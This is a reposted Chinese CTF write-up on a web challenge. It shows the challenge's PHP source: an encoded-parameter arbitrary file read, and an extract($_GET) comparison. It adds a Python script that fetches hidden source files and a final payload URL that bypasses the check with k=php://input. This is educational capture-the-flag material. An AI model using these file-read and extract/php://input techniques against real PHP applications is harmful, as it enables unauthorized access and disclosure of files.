前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >某CTF Web题目wp

某CTF Web题目wp

作者头像
用户5878089
发布2019-07-24 14:26:03
7410
发布2019-07-24 14:26:03
举报

听说有点坑

而且坑的一笔

抓包添加admin 得到源码

代码语言:javascript
复制
<?php
/*
 * url
 * Date: July 4,2018
 */
error_reporting(E_ALL || ~E_NOTICE);

header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
    header('Refresh:0;url=./index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09');
$file = hex2bin(base64_decode(base64_decode($_GET['jpg'])));
echo '<title>'.$_GET['jpg'].'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
echo $file.'</br>';
$file = str_replace("config","!", $file);
echo $file.'</br>';
$txt = base64_encode(file_get_contents($file));

echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
 * Can you find the flag file?
 *
 */
?>

这题的坑点在在于

代码语言:javascript
复制
practice.txt.swp

写一个简单的脚本

用来代替浏览器构造访问

代码语言:javascript
复制
import base64
import requests
def encode2(str1):
    return (base64.b64encode(base64.b64encode(str1.encode('hex'))))
def get1(str1):
    url = 'http://url/index.php?jpg='+encode2(str1)
    print str1,url
    req = requests.get(url)
    print req.text
get1('practice.txt.swp')
get1('f1agconfigddctf.php')

ZjFhZyFkZGN0Zi5waHA=

base64 解密

!用config替换

f1ag!ddctf.php

得到

f1agconfigddctf.php

代码语言:javascript
复制
<?php
include('config.php');
$k = 'hello';
extract($_GET);
if(isset($uid))
{
    $content=trim(file_get_contents($k));
    if($uid==$content)
    {
        echo $flag;
    }
    else
    {
        echo'hello';
    }
}
?>

这里存在一个绕过

可以使用php://

最终的payload

代码语言:javascript
复制
http://url/f1ag!ddctf.php?uid=&k=php://input
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-04-19,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 无级安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档